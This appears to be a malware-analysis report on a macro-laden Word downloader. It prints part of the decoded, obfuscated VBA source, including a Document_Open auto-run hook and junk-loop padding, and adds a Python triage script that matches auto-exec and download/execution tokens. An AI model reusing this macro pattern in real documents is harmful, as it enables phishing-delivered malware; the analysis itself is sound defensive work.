Verdict: MALICIOUS
Risk score: 202
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is a Microsoft Word document (the first VBA module's VB_Base is 1Normal.ThisDocument) whose VBA project contains a Document_Open handler, so the macro runs as soon as the document is opened with macros enabled. The visible source is padded with junk loops whose conditions can never be true; the working code builds a string from values read out of a UserForm module (Cuzfalodaovlu, including a control's Tag property), removes a fixed delimiter with Split/Join and returns the result. The heuristics additionally report a GetObject call and, in the compiled p-code stream, an auto-execution token next to shell/download/object-execution tokens, which indicates that the assembled string is meant to be executed. The ClamAV signature Doc.Downloader.Generic-7542953-0 classifies it as a generic document downloader, so its purpose is most likely to fetch and run a second-stage payload. No specific malware family could be identified.
Heuristics (6)
- ClamAV: Doc.Downloader.Generic-7542953-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Generic-7542953-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): the document contains VBA macro code.
- Document_Open macro (high, OLE_VBA_DOCOPEN): a Document_Open handler is present, so the macro runs automatically when the document is opened with macros enabled.
- GetObject call (high, OLE_VBA_GETOBJ): the macro calls GetObject, which can obtain an automation object (for example a COM object referenced by moniker) that is then used to execute code.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): the compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable, and it is independent of the decoded source shown below.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace URI that Office writes into any document with drawing content, not a network indicator; it should not be treated as a download location.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11375 bytes | 8a86308c7488d3a3487edcd188bd5f3ab1c438cbbd70d0fd2c22e27b6bfccfe3 |

Preview: first 1,000 lines of the extracted script (the analyzer cuts the preview off after the lines shown). Comments marked with ' were added during review to explain the structure; everything else is the decoded source as carved.

```vba
' Module 1: the Word ThisDocument module (VB_Base = 1Normal.ThisDocument).
Attribute VB_Name = "Eqwsqawl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-execution entry point: runs when the document is opened with macros enabled.
' The body of Tyqsnjabq is not within the visible part of the preview.
Private Sub Document_open()
Tyqsnjabq
End Sub
' Module 2: a UserForm (the GUID-pair VB_Base marks a form). Its controls and
' properties carry the string fragments that Xvbedlidaw reads back below.
Attribute VB_Name = "Cuzfalodaovlu"
Attribute VB_Base = "0{18D111D9-FD98-485D-B2D4-DB0E8E982DE9}{EFF2A754-DB18-4F25-B1B8-77BF9F6E9DC9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Module 3: standard module holding the string-building routine.
Attribute VB_Name = "Fzhllwhpyp"
Function Xvbedlidaw()
' Junk block. Gprdphnrkdl (and every other loop variable in this function) is never
' assigned, so it is an Empty Variant that compares as 0; 0 = 900 is False and the
' body never runs. The same block is repeated between each real statement as padding.
Do While Gprdphnrkdl = 900
Do While Jpmwivpqqigw = 3 + 2
Egftusedw = Chr(4)
Mvgpzbpjcc = Sqr(9) + Sleawpglg
Ilejrhqfszjva = CLng(Qhqmdflb)
Pshnqbgdwy = Int(1 + 1)
Rxclxafiperw = CDate(QKoWc)
Uufswksacpjrc = 9 + Int(4)
Loop
Do While Rdlvvptk = 2 + 4
Lvdslalor = CLng(Ydbucrvncf)
Fyagadjbk = Int(1 + 4)
Koohqoxdlr = 2 + Int(3)
Ajbsyxwodnny = Chr(6)
Uklhfbjtqf = Sqr(7) + Fyecnqmeax
Ldnzhxapnf = CDate(QKoWc)
Loop
Loop
' Real statement: wdKeyP is Word's WdKey constant for the P key (80), so this is "P".
Kkpnzqpy = ChrW(wdKeyP)
Do While Wbwyehqsb = 900
Do While Wygnceswwqgl = 3 + 2
Cesyisgd = Chr(4)
Oiuolcxo = Sqr(9) + Xtmvquxbyoqqi
Dxutelti = CLng(Ukelutrqofjsx)
Ufeblyzzmhe = Int(1 + 1)
Rmdkiwwktpeu = CDate(QKoWc)
Uoslzmfjgpgra = 9 + Int(4)
Loop
Do While Sdprvzcbzj = 2 + 4
Dbpzhnyfku = CLng(Pqhfodqvb)
Lodcarnt = Int(1 + 4)
Bbhrpzecpayhl = 2 + Int(3)
Rxnvtgjdb = Chr(6)
Ekxnxbvgno = Sqr(7) + Yelsmzbedbx
Zxhrsxgnevue = CDate(QKoWc)
Loop
Loop
' Real statement: "P" followed by two values read from the UserForm module.
Vfdlkdakfcaq = Kkpnzqpy + Cuzfalodaovlu.Zeyjdarrlbsv + Cuzfalodaovlu.Auxjplcuki
Do While Lkypjxbqkujuh = 900
Do While Rxjeilmj = 3 + 2
Csatwkes = Chr(4)
Yvshbkskkzv = Sqr(9) + Fvaegrmyb
Gfbxnjfbfed = CLng(Bdxsbznh)
Uxwgybppxjf = Int(1 + 1)
Juxattrbbzvdc = CDate(QKoWc)
Wbxfbsgzqdha = 9 + Int(4)
Loop
Do While Gmyzhoxeyto = 2 + 4
Tybdvhwsvl = CLng(Ddvgxmsblvnxd)
Vscdrofnb = Int(1 + 4)
Mtuxlaxadkcxb = 2 + Int(3)
Maxkdazbazshj = Chr(6)
Qurxzyhoknzds = Sqr(7) + Ubwvbfpqlzmr
Ssoofuigeiwel = CDate(QKoWc)
Loop
Loop
' Real statement: a further fragment stored in a form control's Tag property.
Fack = Cuzfalodaovlu.Qnwuylavk.Tag
' Real statement: split on the junk delimiter; the Join below with "" removes it.
Vglylxixtexlb = Split(Vfdlkdakfcaq + LTrim(LTrim(Fack)), "9_msnnj883hn///")
Do While Ifzfpotjepch = 900
Do While Routdjlupw = 3 + 2
Hyvaqcdehhy = Chr(4)
Idzrmvifatlmm = Sqr(9) + Hopdyahuo
Zeedkqaxugmcd = CLng(Jhekodswwsruv)
Ilmnweaw = Int(1 + 1)
Lppavlmdarzq = CDate(QKoWc)
Uhiiktvfcsy = 9 + Int(4)
Loop
Do While Petikwpcocv = 2 + 4
Erudcshwt = CLng(Smpzgmxcuvwzh)
Uongemhdodl = Int(1 + 4)
Futwpxqygpw = 2 + Int(3)
Thlirnuny = Chr(6)
Mkjljbvung = Sqr(7) + Czkjsqnyreytz
Lyedhbkje = CDate(QKoWc)
Loop
Loop
' Return value: the reassembled string wrapped in Jydxcoaz, which is not defined in
' the visible part of the preview.
Xvbedlidaw = Jydxcoaz + Join(Vglylxixtexlb, "") + Jydxcoaz
Do While Hxrpznmw = 900
Do While Xulmenjp = 3 + 2
Knkutqlh = Chr(4)
Nnebxxqt = Sqr(9) + Pmvsfuqeh
Urdrtmxvic = CLng(Sqjpjpgxpwam)
Spzahaxrswbj = Int(1 + 1)
Txkbktccve = CDate(QKoWc)
Ajtxqrtbuiw = 9 + Int(4)
Loop
Do While Evbxmozlvdrm = 2 + 4
Epptvtsz = CLng(Ugjqcqkbcgfyb)
Phcefclrpp = Int(1 + 4)
Oboceidcg = 2 + Int(3)
Jetqjsvgol = Chr(6)
Lpuiviot
```

... (truncated)
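The padding in the preview is the practical problem when reading this kind of macro: a handful of real statements are buried under dozens of loops that can never execute. The following is an added example (not code from the analyzer, from oletools, or from the sample) that strips such loops from decoded VBA source and then applies the same pairing the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic describes, an auto-execution entry point alongside execution/download tokens. It runs on any .bas text such as olevba output and needs only the standard library. The embedded sample is constructed from the preview's own identifiers; the body of Tyqsnjabq is a hypothetical stand-in, because the preview is cut off before it and only the OLE_VBA_GETOBJ heuristic tells us a GetObject call exists somewhere in the project.

```python
import re

# Constructed sample modelled on the extracted macro above. The Tyqsnjabq body is a
# hypothetical stand-in (assumption, not in the preview); all other lines are from it.
SAMPLE_VBA = """\
Private Sub Document_open()
Tyqsnjabq
End Sub
Function Xvbedlidaw()
Do While Gprdphnrkdl = 900
Do While Jpmwivpqqigw = 3 + 2
Egftusedw = Chr(4)
Loop
Loop
Kkpnzqpy = ChrW(wdKeyP)
Do While Wbwyehqsb = 900
Cesyisgd = Chr(4)
Loop
Vfdlkdakfcaq = Kkpnzqpy + Cuzfalodaovlu.Zeyjdarrlbsv + Cuzfalodaovlu.Auxjplcuki
Fack = Cuzfalodaovlu.Qnwuylavk.Tag
Vglylxixtexlb = Split(Vfdlkdakfcaq + LTrim(LTrim(Fack)), "9_msnnj883hn///")
Xvbedlidaw = Jydxcoaz + Join(Vglylxixtexlb, "") + Jydxcoaz
End Function
Sub Tyqsnjabq()
Set Obj = GetObject(Xvbedlidaw())
End Sub
"""

AUTOEXEC = re.compile(
    r"\b(Document_Open|AutoOpen|Auto_Open|Workbook_Open|AutoExec|AutoClose)\b", re.I)
EXEC_TOKENS = re.compile(
    r"\b(GetObject|CreateObject|Shell|WScript\.Shell|URLDownloadToFile|XMLHTTP|ADODB\.Stream)\b",
    re.I)
ASSIGN = re.compile(r"^\s*([A-Za-z_]\w*)\s*=")
LOOP_OPEN = re.compile(r"^\s*Do\s+While\s+([A-Za-z_]\w*)\s*=\s*(.+?)\s*$", re.I)
LOOP_CLOSE = re.compile(r"^\s*Loop\s*$", re.I)


def _nonzero_int_expr(expr):
    """True for a sum of integer literals ('900', '3 + 2') that is not 0.
    Anything else returns False: a loop is only stripped when its test is provably
    false. An unassigned VBA variable is an Empty Variant, which compares equal to 0,
    so 'Do While X = 0' with X never assigned would really loop (forever)."""
    if not re.fullmatch(r"[\d\s+]+", expr):
        return False
    return sum(int(t) for t in expr.split("+")) != 0


def strip_dead_loops(source):
    """Remove 'Do While <never-assigned> = <nonzero const> ... Loop' blocks,
    including any loops nested inside them. Returns (cleaned_source, lines_removed)."""
    lines = source.splitlines()
    assigned = set()
    for ln in lines:
        m = ASSIGN.match(ln)
        if m:
            assigned.add(m.group(1).lower())
    out, depth = [], 0          # depth > 0 while inside a block being discarded
    for ln in lines:
        m = LOOP_OPEN.match(ln)
        if depth:
            if m:
                depth += 1      # a loop nested inside dead code is dead too
            elif LOOP_CLOSE.match(ln):
                depth -= 1
            continue
        if m and m.group(1).lower() not in assigned and _nonzero_int_expr(m.group(2)):
            depth = 1
            continue
        out.append(ln)
    return "\n".join(out), len(lines) - len(out)


def triage(source):
    """Strip junk, then pair auto-exec entry points with execution/download tokens."""
    clean, removed = strip_dead_loops(source)
    autoexec = sorted({m.group(1).lower() for m in AUTOEXEC.finditer(clean)})
    exec_tokens = sorted({m.group(1).lower() for m in EXEC_TOKENS.finditer(clean)})
    return {
        "clean": clean,
        "lines_removed": removed,
        "autoexec": autoexec,
        "exec_tokens": exec_tokens,
        "autoexec_with_exec": bool(autoexec) and bool(exec_tokens),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    print(result["clean"])
    print(result["lines_removed"], result["autoexec"], result["exec_tokens"],
          result["autoexec_with_exec"])
```

The stripping rule is deliberately narrow: it removes a loop only when the loop variable is never assigned anywhere in the module and the constant is non-zero, so it cannot delete a loop that actually runs. Against the full preview the same rule leaves the five real statements of Xvbedlidaw, which is what an analyst then works from to find where the assembled string is consumed.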